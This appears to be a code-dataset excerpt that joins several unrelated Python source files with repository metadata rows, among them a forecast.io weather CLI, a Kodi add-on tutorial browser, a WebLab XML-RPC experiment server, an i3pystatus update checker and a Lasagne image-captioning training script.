return '\N{DEGREE SIGN}F' if UNITS == 'us' else '\N{DEGREE SIGN}C'
def getPrecip(probability, type):
probability = '{:3.0f} {:1}'.format(probability * 100, '%')
return '{:} {:>5}'.format(probability, '-') if type == 0 else '{:} {:>5}'.format(probability, type)
def showDaily(measuring_unit):
HEAD = ['Date', 'Temp min', 'Temp max', 'HUM', 'SR', 'SS', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for day in result['daily']['data']:
table.add_row([formatDatetime(day['time'], '%d. %b.'), '{:4.2f} {:2}'.format(day['temperatureMin'],
measuring_unit), '{:4.2f} {:2}'.format(day['temperatureMax'], measuring_unit),
'{:3.0f} {:1}'.format(day['humidity'] * 100, '%'), formatDatetime(day['sunriseTime'], '%H:%M'),
formatDatetime(day['sunsetTime'], '%H:%M'), getPrecip(day['precipProbability'],
day['precipType'] if day['precipProbability'] > 0 else 0), day['summary']])
print('\n', end='')
print(table)
def showHourly(measuring_unit):
HEAD = ['Date', 'Temp', 'HUM', 'Precip', 'Summary']
table = PrettyTable(HEAD, border = False, padding_width = 2)
table.align='r'
table.align['Date'] = 'l'
table.align['Summary'] = 'l'
for hour in result['hourly']['data'][0:LIMIT]:
table.add_row([formatDatetime(hour['time'], '%d. %b. %H:%M'), '{:4.2f} {:2}'.format(hour['temperature'],
measuring_unit), '{:3.0f} {:1}'.format(hour['humidity'] * 100, '%'), getPrecip(hour['precipProbability'],
hour['precipType'] if hour['precipProbability'] > 0 else 0), hour['summary']])
print('\n', end='')
print(table)
if __name__ == '__main__':
if not API_KEY or not LAT or not LONG:
sys.exit("aborted! please make sure api-key and coordinates are specified")
parser = argparse.ArgumentParser(description='weather forecast powered by forecast.io')
group = parser.add_mutually_exclusive_group()
group.add_argument('-df', help='daily forecast', action='store_true')
group.add_argument('-hf', help='hourly forecast', action='store_true')
args = parser.parse_args()
BASE_URL = 'https://api.forecast.io/forecast/'
SETTINGS = API_KEY + '/' + LAT + ',' + LONG + '?units=' + UNITS + '&lang='+ LANG + '&exclude=flags,minutely,'
URL = BASE_URL + SETTINGS
HTTP_HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0',
'Accept-Encoding': 'gzip'}
MEAS_UNIT = getMeasuringUnit()
if args.df:
URL += 'hourly,currently'
elif args.hf:
URL += 'daily,currently'
else:
URL += 'hourly,daily'
result = requests.get(URL, headers=HTTP_HEADERS)
if result.status_code == 200:
result = result.json()
if args.df:
showDaily(MEAS_UNIT)
elif args.hf:
showHourly(MEAS_UNIT)
else:
print('{:} {:10}'.format('\n date:', formatDatetime(result['currently']['time'])), end='')
print('{:} {:6.2f} {:2}'.format(' | temp:', result['currently']['temperature'], MEAS_UNIT), end='')
print('{:} {:2.0f} {:1}'.format(' | humidity:', result['currently']['humidity'] * 100, '%'), end='')
print('{:} {:}'.format(' | precipitation:', getPrecip(result['currently']['precipProbability'],
result['currently']['precipType'] if result['currently']['precipProbability'] > 0 else 0)))
else:
print('aborted! problems connecting to forecast.io')
| mit | -898,684,992,294,098,300 | 40.676471 | 117 | 0.605034 | false |
repotvsupertuga/tvsupertuga.repository | script.module.python.koding.aio/lib/koding/tutorials.py | 1 | 7420 | # -*- coding: utf-8 -*-
# script.module.python.koding.aio
# Python Koding AIO (c) by TOTALREVOLUTION LTD ([email protected])
# Python Koding AIO is licensed under a
# Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License.
# You should have received a copy of the license along with this
# work. If not, see http://creativecommons.org/licenses/by-nc-nd/4.0.
# Please make sure you've read and understood the license, this code can NOT be used commercially
# and it can NOT be modified and redistributed. If you're found to be in breach of this license
# then any affected add-ons will be blacklisted and will not be able to work on the same system
# as any other add-ons which use this code. Thank you for your cooperation.
import os
import re
import sys
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
import xbmcvfs
from directory import Add_Dir
from filetools import Text_File
from vartools import Find_In_Text
from guitools import Text_Box, Show_Busy, Keyboard
from systemtools import Sleep_If_Window_Active
from video import Play_Video
from web import Open_URL
dialog = xbmcgui.Dialog()
py_path = 'special://home/addons/script.module.python.koding.aio/lib/koding'
video_base = 'http://totalrevolution.tv/videos/python_koding/'
#----------------------------------------------------------------
def Grab_Tutorials():
""" internal command ~"""
import re
full_array = []
dirs,files = xbmcvfs.listdir(py_path)
# Check all the modules for functions with tutorial info
for file in files:
file_path = os.path.join(py_path,file)
if file.endswith('.py') and file != 'tutorials.py':
content = Text_File(file_path,'r').replace('\r','')
# content_array = re.compile('# TUTORIAL #\ndef (.+?)\(').findall(content)
content_array = Find_In_Text(content=content, start='# TUTORIAL #\ndef ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
content_array = Find_In_Text(content=content, start='# TUTORIAL #\nclass ', end='\(', show_errors=False)
if content_array:
for item in content_array:
item = item.strip()
full_array.append('%s~%s'%(item,file_path))
# Return a list of tutorials
Add_Dir('[COLOR=gold]CREATE YOUR FIRST ADD-ON[/COLOR]',video_base+'Create_Addon.mov','play_video', folder=False, icon='', fanart='', description='How to create your own add-on using the Python Koding framework.')
for item in sorted(full_array,key=str.lower):
name, filepath = item.split('~')
filepath = urllib.quote(filepath)
Add_Dir(name=name.upper().replace('_',' '), url='%s~%s'%(name,filepath), mode='show_tutorial', folder=False, icon='', fanart='', description='Instructions for how to use the %s function.'%name)
#----------------------------------------------------------------
def Show_Tutorial(url):
""" internal command ~"""
name, filepath = url.split('~')
filepath = urllib.unquote(filepath)
readfile = Text_File(filepath,'r').replace('\r','')
try:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\ndef %s' % name,end='~"""')[0]
except:
raw_find = Find_In_Text(content=readfile, start='# TUTORIAL #\nclass %s' % name,end='~"""')[0]
# Check if an example code segment exists in the comments
if 'EXAMPLE CODE:' in raw_find:
code = re.findall(r'(?<=EXAMPLE CODE:)(?s)(.*$)', raw_find)[0]
code = code.replace('script.module.python.koding.aio','temp_replace_string')
code = code.replace('koding.','').strip()
code = code.replace('temp_replace_string','script.module.python.koding.aio')
else:
code = None
# Check if a video exists in the comments
internetstate = xbmc.getInfoLabel('System.InternetState')
if internetstate:
video_page = Open_URL(video_base)
extension = Find_In_Text(video_page, name, '"', False)
if extension != '' and extension != None:
video = video_base+name+extension[0]
else:
video = None
else:
video = None
counter = 0
removal_string = ''
final_header = ''
newline = ''
temp_raw = raw_find.splitlines()
for line in temp_raw:
if counter == 0:
removal_string += line
if '[' in line:
replace_file = Find_In_Text(content=line,start='\[',end='\]')
for item in replace_file:
line = line.replace(item,'')
if ',' in line:
header_extension = line.split(',')
for item in header_extension:
if '=' in item:
item = item.split('=')[0]
final_header += item+','
final_header = 'koding.'+name+final_header[:-2]+')'
else:
final_header = 'koding.'+name+line[:-1]
else:
removal_string += '\n'+line
counter += 1
if counter == 2:
break
if final_header.endswith('))'):
final_header = final_header[:-1]
if final_header.startswith('koding.User_Info'):
final_header = 'koding.User_Info()'
full_text = raw_find.replace(removal_string,'').strip()
# Initialise the dialog select
dialog_array = ['Documentation']
if code:
dialog_array.append('Run Example Code')
if video:
dialog_array.append('Watch Video')
# If there's more than one item we show a dialog select otherwise we just load up the text window
if len(dialog_array) > 1:
choice = dialog.select(name, dialog_array)
if choice >= 0:
choice = dialog_array[choice]
if choice == 'Documentation':
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
elif choice == 'Run Example Code':
codefile = filepath.split(os.sep)
codefile = codefile[len(codefile)-1].replace('.py','')
exec('from %s import *' % codefile)
# exec('from %s import %s' % (codefile, params["name"]))
exec(code)
elif choice == 'Watch Video':
Play_Video(video)
if choice < 0:
return
else:
Text_Box(final_header,full_text
.replace('AVAILABLE PARAMS:','[COLOR=dodgerblue]AVAILABLE PARAMS:[/COLOR]')
.replace('EXAMPLE CODE:','[COLOR=dodgerblue]EXAMPLE CODE:[/COLOR]')
.replace('IMPORTANT:','[COLOR=gold]IMPORTANT:[/COLOR]')
.replace('CODE:','[COLOR=dodgerblue]CODE:[/COLOR]')
.replace('AVAILABLE VALUES:','[COLOR=dodgerblue]AVAILABLE VALUES:[/COLOR]')
.replace('WARNING:','[COLOR=red]WARNING:[/COLOR]'))
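#----------------------------------------------------------------
# Illustrative sketch (hypothetical names, shown as comments only): the
# functions picked up by Grab_Tutorials/Show_Tutorial above are expected to be
# annotated in the koding modules like this - a `# TUTORIAL #` marker directly
# above the def, a docstring terminated by `~"""`, and an optional
# `EXAMPLE CODE:` section whose code can be executed from the dialog.
#
# # TUTORIAL #
# def My_Function(some_param='default'):
#     """
#     Short description of what My_Function does.
#     AVAILABLE PARAMS:
#         some_param  -  What this parameter controls.
#     EXAMPLE CODE:
#     koding.My_Function(some_param='default')
#     ~"""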
| gpl-2.0 | -4,688,523,344,214,192,000 | 42.893491 | 216 | 0.588434 | false |
zstars/weblabdeusto | experiments/managed/libs/server/python/weblab_server.py | 1 | 2986 | #!/usr/bin/env python
#-*-*- encoding: utf-8 -*-*-
#
# Copyright (C) 2005-2009 University of Deusto
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# This software consists of contributions made by many individuals,
# listed below:
#
# Author: Pablo Orduña <[email protected]>
#
"""
There are two ways of implementing an Experiment Server in
Python:
* Using the WebLab infrastructure (see weblab.experiment.experiments)
* As standalone simple applications, as this one
The advantage of the first approach is that the developer has access
to all the tools provided by voodoo, including the deployment tools.
An experiment developed this way can be in the same process as the
Laboratory Server, or communicate in a faster way.
However, the second approach is far simpler for a programmer not
involved or new to the WebLab-Deusto project.
In order to use the second approach, you should make a class that
inherits from ExperimentServer, and use the launch method to run it :-)
"""
import SimpleXMLRPCServer
class ExperimentServer(object):
def test_me(self, message):
return message
def is_up_and_running(self):
return True
def start_experiment(self, client_initial_data, server_initial_data):
return "{}"
def send_file(self, content, file_info):
return "ok"
def send_command(self, command_string):
return "ok"
def dispose(self):
return "{}"
def should_finish(self):
return 0
def get_api(self):
return "2"
class WebLabHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
rpc_paths = '/','/RPC2','/weblab/xmlrpc','/weblab/xmlrpc/','/weblab','/weblab/'
class Launcher(object):
def __init__(self, port, experiment_server):
super(Launcher, self).__init__()
self.port = port
self.experiment_server = experiment_server
def start(self):
self.server = SimpleXMLRPCServer.SimpleXMLRPCServer(("localhost", self.port), WebLabHandler)
self.server.register_function(self.experiment_server.test_me, "Util.test_me")
self.server.register_function(self.experiment_server.is_up_and_running, "Util.is_up_and_running")
self.server.register_function(self.experiment_server.start_experiment, "Util.start_experiment")
self.server.register_function(self.experiment_server.send_file, "Util.send_file_to_device")
self.server.register_function(self.experiment_server.send_command, "Util.send_command_to_device")
self.server.register_function(self.experiment_server.dispose, "Util.dispose")
self.server.register_function(self.experiment_server.get_api, "Util.get_api")
self.server.register_function(self.experiment_server.should_finish, "Util.should_finish")
print "Running XML-RPC server on port %i" % self.port
self.server.serve_forever()
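# Illustrative usage sketch, not part of the original module: the docstring
# above suggests subclassing ExperimentServer and running it with Launcher.
# The class name and port number below are assumptions for demonstration.
class DummyExperimentServer(ExperimentServer):
    def send_command(self, command_string):
        # echo the command so a client can verify the round trip
        print "Received command: %s" % command_string
        return "ok"
if __name__ == '__main__':
    # start the XML-RPC Experiment Server on an arbitrary local port
    Launcher(10039, DummyExperimentServer()).start()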
| bsd-2-clause | 3,668,985,022,238,411,000 | 33.709302 | 105 | 0.706198 | false |
juliushaertl/i3pystatus | i3pystatus/updates/__init__.py | 1 | 3829 | import threading
from i3pystatus import SettingsBase, Module, formatp
from i3pystatus.core.util import internet, require
class Backend(SettingsBase):
settings = ()
updates = 0
class Updates(Module):
"""
Generic update checker.
    To use it, select the appropriate backend(s) for your system.
For list of all available backends see :ref:`updatebackends`.
Left clicking on the module will refresh the count of upgradeable packages.
This may be used to dismiss the notification after updating your system.
.. rubric:: Available formatters
* `{count}` — Sum of all available updates from all backends.
    * For each backend registered there is one formatter named after the backend;
      multiple identical backends do not accumulate, but overwrite each other.
    * For example, `{Cower}` (note capital C) is the number of updates reported by
the cower backend, assuming it has been registered.
.. rubric:: Usage example
::
from i3pystatus import Status
from i3pystatus.updates import pacman, cower
status = Status(standalone=True)
status.register("updates",
format = "Updates: {count}",
format_no_updates = "No updates",
backends = [pacman.Pacman(), cower.Cower()])
status.run()
"""
interval = 3600
settings = (
("backends", "Required list of backends used to check for updates."),
("format", "Format used when updates are available. "
"May contain formatters."),
("format_no_updates", "String that is shown if no updates are available."
" If not set the module will be hidden if no updates are available."),
("format_working", "Format used while update queries are run. By default the same as ``format``."),
"color",
"color_no_updates",
"color_working",
("interval", "Default interval is set to one hour."),
)
required = ("backends",)
backends = None
format = "Updates: {count}"
format_no_updates = None
format_working = None
color = "#00DD00"
color_no_updates = "#FFFFFF"
color_working = None
on_leftclick = "run"
def init(self):
if not isinstance(self.backends, list):
self.backends = [self.backends]
if self.format_working is None: # we want to allow an empty format
self.format_working = self.format
self.color_working = self.color_working or self.color
self.data = {
"count": 0
}
self.condition = threading.Condition()
self.thread = threading.Thread(target=self.update_thread, daemon=True)
self.thread.start()
def update_thread(self):
self.check_updates()
while True:
with self.condition:
self.condition.wait(self.interval)
self.check_updates()
@require(internet)
def check_updates(self):
self.output = {
"full_text": formatp(self.format_working, **self.data).strip(),
"color": self.color_working,
}
updates_count = 0
for backend in self.backends:
updates = backend.updates
updates_count += updates
self.data[backend.__class__.__name__] = updates
if updates_count == 0:
self.output = {} if not self.format_no_updates else {
"full_text": self.format_no_updates,
"color": self.color_no_updates,
}
return
self.data["count"] = updates_count
self.output = {
"full_text": formatp(self.format, **self.data).strip(),
"color": self.color,
}
def run(self):
with self.condition:
self.condition.notify()
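# Illustrative sketch, not shipped with i3pystatus: a minimal custom backend.
# A backend only needs to expose an `updates` attribute or property holding
# the number of pending updates; the "checkupdates" command used here is an
# assumption for demonstration purposes.
class ExampleCommandBackend(Backend):
    """counts the lines printed by an update-checking command"""
    @property
    def updates(self):
        import subprocess
        try:
            output = subprocess.check_output(["checkupdates"])
        except (OSError, subprocess.CalledProcessError):
            # treat a missing or failing command as "no updates"
            return 0
        return len(output.splitlines())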
| mit | 3,242,534,360,093,105,000 | 30.628099 | 107 | 0.597857 | false |
git-pedro-77/PROYECTOFINALPYTHON | proyectoITSAE/ec/edu/itsae/dao/ventaDao.py | 1 | 2654 | # coding:utf-8
'''
Created on 27/1/2015
@author: Programacion
'''
from ec.edu.itsae.conn import DBcon
#from flask import redirect, url_for
import json
class VentaDao(DBcon.DBcon):#heredando
'''
classdocs
'''
def __init__(self):
'''
Constructor
'''
        pass  # used when the method body has no implementation
def reportarventa(self):
        con=self.conexion().connect().cursor()  # getting a cursor from the DBcon class
con.execute(" select * from venta ")
reporte=con.fetchall()
        return reporte  # nothing should be placed after the return
def grabarVenta(self, vendedor, turno, fechaventa,gestion ):
con=self.conexion().connect()
sql= """insert into venta(vendedor, turno, fechaventa, gestion)
values ('%s','%s', '%s','%s')
""" %(vendedor, turno, fechaventa,gestion )
        #print sql  # uncomment to print the query for inspection
with con:
cursor=con.cursor()
            cursor.execute(sql)  # sql goes here so the insert is executed
        # TODO: implement update and delete as well
''' def eliminarCliente(self,datoelim):
con=self.conexion().connect()
sql= """ delete from cliente where id_cliente= %i """ %int(datoelim)
        #print sql  # uncomment to print the query for inspection
with con:
cursor=con.cursor()
cursor.execute(sql)'''
def buscarVentaFactura(self, datobusca):
con=self.conexion().connect().cursor()
con.execute(""" select CONCAT (nombre,' ', apellido) as value, id_cliente as id from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobusca+"%") )
reporte=con.fetchall()
columna=('value', 'id')
lista=[]
for row in reporte:
lista.append(dict(zip(columna,row)))
return json.dumps(lista, indent=2)
def buscarVentaDato(self, datobuscado):
con=self.conexion().connect().cursor()
sql=""" select * from cliente where upper(CONCAT (nombre,' ', apellido)) like upper('%s') """ %("%"+datobuscado+"%")
con.execute(sql)
reporte=con.fetchall()
return reporte
def validarventa(self, datot):
con=self.conexion().connect().cursor()
sql=""" select * from personas p, trabajador t where t.idpersona=%i """ %(datot)
con.execute(sql)
reporte=con.fetchall()
return reporte
| gpl-2.0 | -8,052,328,900,098,061,000 | 32.051282 | 187 | 0.558779 | false |
erfannoury/capgen-lasagne | another no-ft-ln-hs-largelr.py | 1 | 13876 | from __future__ import division, print_function
import logging
import numpy as np
import scipy as sc
import skimage
from skimage import transform
import theano
import theano.tensor as T
import lasagne
import sys
import cPickle as pickle
from datetime import datetime
from collections import OrderedDict
from mscoco_threaded_iter import COCOCaptionDataset
sys.path.append('/home/noury/codevault/Recipes/modelzoo/')
sys.path.append('/home/noury/codevault/seq2seq-lasagne/')
from resnet50 import build_model
from CustomLSTMLayer import LNLSTMLayer
from HierarchicalSoftmax import HierarchicalSoftmaxLayer
from LayerNormalization import LayerNormalizationLayer
sys.setrecursionlimit(10000)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s %(message)s', '%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler('another_no_ft_ln_hs_largelr.log')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
sh = logging.StreamHandler(sys.stdout)
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info('Loading the ResNet50 model.')
# First get the ResNet50 model
resnet_weights_path = '/home/noury/modelzoo/resnet50.pkl'
resnet = build_model()
model_params = pickle.load(open(resnet_weights_path, 'rb'))
lasagne.layers.set_all_param_values(resnet['prob'], model_params['values'])
mean_im = model_params['mean_image'].reshape((1, 3, 224, 224)).astype(np.float32)
# Load the files needed for the MS COCO Captions dataset
train_images_path = '/home/noury/datasets/mscoco/train2014'
valid_images_path = '/home/noury/datasets/mscoco/val2014'
train_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_train2014.json'
valid_annotations_filepath = '/home/noury/datasets/mscoco/annotations/captions_val2014.json'
coco_captions = pickle.load(open('coco_captions_trainval2014.pkl', 'rb'))
train_buckets = coco_captions['train buckets']
valid_buckets = coco_captions['valid buckets']
wordset = coco_captions['raw wordset']
word2idx = {}
word2idx['<PAD>'] = 0
word2idx['<GO>'] = 1
word2idx['<EOS>'] = 2
for i, w in enumerate(wordset):
word2idx[w] = i+3
idx2word = map(lambda x: x[0], sorted(word2idx.items(), key=lambda x: x[1]))
bucket_minibatch_sizes = {16:256, 32:128, 64:64}
logger.info('Creating global variables')
CONTINUE = False
HIDDEN_SIZE = 2048
EMBEDDING_SIZE = 300
WORD_SIZE = len(idx2word)
DENSE_SIZE = 1024
ORDER_VIOLATION_COEFF = 10.0
L2_COEFF = 1e-3
RNN_GRAD_CLIP = 64
TOTAL_MAX_NORM = 128
RECURR_LR = theano.shared(np.float32(0.001), 'recurrent lr')
EPOCH_LR_COEFF = np.float32(0.5)
NUM_EPOCHS = 15
validation_losses = []
total_loss_values = []
order_embedding_loss_values = []
l2_values = []
recurrent_norm_values = []
validation_total_loss_values = []
validation_order_embedding_loss_values = []
validation_l2_values = []
logger.info('Building the network.')
im_features = lasagne.layers.get_output(resnet['pool5'])
im_features = T.flatten(im_features, outdim=2) # batch size, number of features
cap_out_var = T.imatrix('cap_out') # batch size, seq len
cap_in_var = T.imatrix('cap_in') # batch size, seq len
mask_var = T.bmatrix('mask_var') # batch size, seq len
l_hid = lasagne.layers.InputLayer((None, HIDDEN_SIZE), input_var=im_features, name="l_hid")
gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(0.0))
cell_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=None, b=lasagne.init.Constant(0.0),
nonlinearity=lasagne.nonlinearities.tanh)
forget_gate = lasagne.layers.Gate(W_in=lasagne.init.Normal(0.02), W_hid=lasagne.init.Orthogonal(),
W_cell=lasagne.init.Normal(), b=lasagne.init.Constant(5.0))
l_in = lasagne.layers.InputLayer((None, None), cap_in_var, name="l_in")
l_mask = lasagne.layers.InputLayer((None, None), mask_var, name="l_mask")
l_emb = lasagne.layers.EmbeddingLayer(l_in, input_size=WORD_SIZE, output_size=EMBEDDING_SIZE, name="l_emb")
l_lstm = LNLSTMLayer(l_emb, HIDDEN_SIZE, ingate=gate, forgetgate=forget_gate, cell=cell_gate,
outgate=gate, hid_init=l_hid, peepholes=False, grad_clipping=RNN_GRAD_CLIP,
mask_input=l_mask, precompute_input=False,
alpha_init=lasagne.init.Constant(0.1), # as suggested by Ryan Kiros on Twitter
normalize_cell=False,
name="l_lstm") # batch size, seq len, hidden size
l_reshape = lasagne.layers.ReshapeLayer(l_lstm, (-1, [2]), name="l_reshape") # batch size * seq len, hidden size
l_fc = lasagne.layers.DenseLayer(l_reshape, DENSE_SIZE, b=lasagne.init.Constant(5.0),
nonlinearity=lasagne.nonlinearities.rectify, name="l_fc")
l_drp = lasagne.layers.DropoutLayer(l_fc, 0.3, name="l_drp")
l_hs = HierarchicalSoftmaxLayer(l_drp, WORD_SIZE, name="l_hs") # batch size * seq len, WORD SIZE
l_slice = lasagne.layers.SliceLayer(l_lstm, -1, axis=1, name="l_slice")
if CONTINUE:
import glob
param_values = glob.glob('another_no_ft_ln_hs_largelr_param_values_*.pkl')
max_epoch = max(map(lambda x: int(x[len('another_no_ft_ln_hs_largelr_param_values_'):-len('.pkl')]), param_values))
logger.info('Continue training from epoch {}'.format(max_epoch + 1))
logger.info('Setting previous parameter values from epoch {}'.format(max_epoch))
logger.info('Setting model weights from epoch {}'.format(max_epoch))
param_values_file = 'another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(max_epoch)
param_values = pickle.load(open(param_values_file, 'rb'))
lasagne.layers.set_all_param_values(l_hs, param_values['recurrent'])
lasagne.layers.set_all_param_values(resnet['pool5'], param_values['resnet'])
RECURR_LR = theano.shared(np.float32(param_values['lr']), 'recurrent lr')
[total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values]= pickle.load(open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'rb'))
[validation_total_loss_values, validation_order_embedding_loss_values,
validation_l2_values] = pickle.load(open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'rb'))
[validation_losses, recurr_lr_val] = pickle.load(open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'rb'))
logger.info('Creating output and loss variables')
prediction = lasagne.layers.get_output(l_hs, deterministic=False)
flat_cap_out_var = T.flatten(cap_out_var, outdim=1)
flat_mask_var = T.flatten(lasagne.layers.get_output(l_mask), outdim=1)
loss = T.mean(lasagne.objectives.categorical_crossentropy(prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
caption_features = lasagne.layers.get_output(l_slice, deterministic=False)
order_embedding_loss = T.pow(T.maximum(0, caption_features - im_features), 2).mean()
l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
total_loss = loss + ORDER_VIOLATION_COEFF * order_embedding_loss + L2_COEFF * l2
deterministic_prediction = lasagne.layers.get_output(l_hs, deterministic=True)
deterministic_captions = lasagne.layers.get_output(l_slice, deterministic=True)
deterministic_loss = T.mean(lasagne.objectives.categorical_crossentropy(deterministic_prediction, flat_cap_out_var)[flat_mask_var.nonzero()])
deterministic_order_embedding_loss = T.pow(T.maximum(0, deterministic_captions - im_features), 2).mean()
deterministic_l2 = lasagne.regularization.regularize_network_params(l_hs, lasagne.regularization.l2)
deterministic_total_loss = deterministic_loss + ORDER_VIOLATION_COEFF * deterministic_order_embedding_loss \
+ L2_COEFF * deterministic_l2
logger.info('Getting all parameters and creating update rules.')
recurrent_params = lasagne.layers.get_all_params(l_hs, trainable=True)
recurrent_grads = T.grad(total_loss, recurrent_params)
recurrent_grads, recurrent_norm = lasagne.updates.total_norm_constraint(recurrent_grads, TOTAL_MAX_NORM, return_norm=True)
recurrent_updates = lasagne.updates.rmsprop(recurrent_grads, recurrent_params, learning_rate=RECURR_LR)
logger.info("Creating the Theano function for Adam update")
train_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[total_loss, order_embedding_loss, l2, recurrent_norm],
updates=recurrent_updates)
logger.info("Creating the evaluation Theano function")
eval_fun = theano.function([resnet['input'].input_var, cap_in_var, mask_var, cap_out_var],
[deterministic_total_loss, deterministic_order_embedding_loss, deterministic_l2])
logger.info('Loading the COCO Captions training and validation sets.')
coco_train = COCOCaptionDataset(train_images_path, train_annotations_filepath, train_buckets,
bucket_minibatch_sizes, word2idx, mean_im, True)
coco_valid = COCOCaptionDataset(valid_images_path, valid_annotations_filepath, valid_buckets,
bucket_minibatch_sizes, word2idx, mean_im, False)
logger.info("Starting the training process...")
START = 1
if CONTINUE:
START = max_epoch + 1
for e in xrange(START, NUM_EPOCHS + 1):
logger.info("Starting epoch".format(e))
if len(validation_losses) > 2 and \
validation_losses[-3] < validation_losses[-1] and \
validation_losses[-2] < validation_losses[-1]:
RECURR_LR.set_value(RECURR_LR.get_value() * EPOCH_LR_COEFF)
logger.info("Lowering the learning rate to {}".format(RECURR_LR.get_value()))
logger.info("Starting training on epoch {} with LR = {}".format(e, RECURR_LR.get_value()))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_train:
tl, oe, el2, recn = train_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Epoch: {}, Minibatch: {}, Total Loss: {}, Order-embedding loss: {}, L2 value: {}, Recurrent norm: {}".format(e, mb, tl, oe, el2, recn))
total_loss_values.append(tl)
order_embedding_loss_values.append(oe)
l2_values.append(el2)
recurrent_norm_values.append(recn)
mb += 1
logger.info("Training epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} results:".format(e))
logger.info("\t\tMean total loss: {}".format(np.mean(total_loss_values[-mb:])))
logger.info("\t\tMean order embedding loss: {}".format(np.mean(order_embedding_loss_values[-mb:])))
logger.info("\t\tMean l2 value: {}".format(np.mean(l2_values[-mb:])))
logger.info("\t\tMean Recurrent norm: {}".format(np.mean(recurrent_norm_values[-mb:])))
logger.info("Saving model parameters for epoch {}".format(e))
pickle.dump({'resnet':lasagne.layers.get_all_param_values(resnet['pool5']),
'recurrent':lasagne.layers.get_all_param_values(l_hs),
'mean image':mean_im,
'lr':RECURR_LR.get_value()},
open('another_no_ft_ln_hs_largelr_param_values_{}.pkl'.format(e), 'wb'), protocol=-1)
logger.info("Saving loss values for epoch {}".format(e))
pickle.dump([total_loss_values, order_embedding_loss_values, l2_values,
recurrent_norm_values],
open('another_no_ft_ln_hs_largelr_training_losses.pkl', 'wb'), protocol=-1)
logger.info("Validating the model on epoch {} on the validation set.".format(e))
mb = 0
now = datetime.now()
for im, cap_in, cap_out in coco_valid:
tl, oe, el2 = eval_fun(im, cap_in, (cap_in > 0).astype(np.int8), cap_out)
logger.debug("Validation epoch: {}, Minibatch: {}, Validation total loss: {}, Validation order-embedding loss: {}, Validation l2 value: {}".format(e, mb, tl, oe, el2))
validation_total_loss_values.append(tl)
validation_order_embedding_loss_values.append(oe)
validation_l2_values.append(el2)
mb += 1
logger.info("Validating epoch {} took {}.".format(e, datetime.now() - now))
logger.info("Epoch {} validation results:".format(e))
logger.info("\t\tValidation mean total loss: {}".format(np.mean(validation_total_loss_values[-mb:])))
logger.info("\t\tValidation mean order-embedding loss: {}".format(np.mean(validation_order_embedding_loss_values[-mb:])))
logger.info("\t\tValidation mean l2 value: {}".format(np.mean(validation_l2_values[-mb:])))
validation_losses.append(np.mean(validation_total_loss_values[-mb:]))
logger.info("Saving validation loss values for epoch {}".format(e))
pickle.dump([validation_total_loss_values, validation_order_embedding_loss_values, validation_l2_values],
open('another_no_ft_ln_hs_largelr_validation_losses.pkl', 'wb'), protocol=-1)
pickle.dump([validation_losses, RECURR_LR.get_value()], open('another_no_ft_ln_hs_largelr_artifacts.pkl', 'wb'),
protocol=-1)
| mit | 2,184,633,508,584,648,400 | 55.868852 | 179 | 0.652061 | false |
goulu/Goulib | Goulib/plot.py | 1 | 4898 | """
plotable rich object display on IPython/Jupyter notebooks
"""
__author__ = "Philippe Guglielmetti"
__copyright__ = "Copyright 2015, Philippe Guglielmetti"
__credits__ = []
__license__ = "LGPL"
# import matplotlib and set backend once for all
from . import itertools2
import os
import io
import sys
import logging
import base64
import matplotlib
if os.getenv('TRAVIS'): # are we running https://travis-ci.org/ automated tests ?
matplotlib.use('Agg') # Force matplotlib not to use any Xwindows backend
elif sys.gettrace(): # http://stackoverflow.com/questions/333995/how-to-detect-that-python-code-is-being-executed-through-the-debugger
matplotlib.use('Agg') # because 'QtAgg' crashes python while debugging
else:
pass
# matplotlib.use('pdf') #for high quality pdf, but doesn't work for png, svg ...
logging.info('matplotlib backend is %s' % matplotlib.get_backend())
class Plot(object):
"""base class for plotable rich object display on IPython notebooks
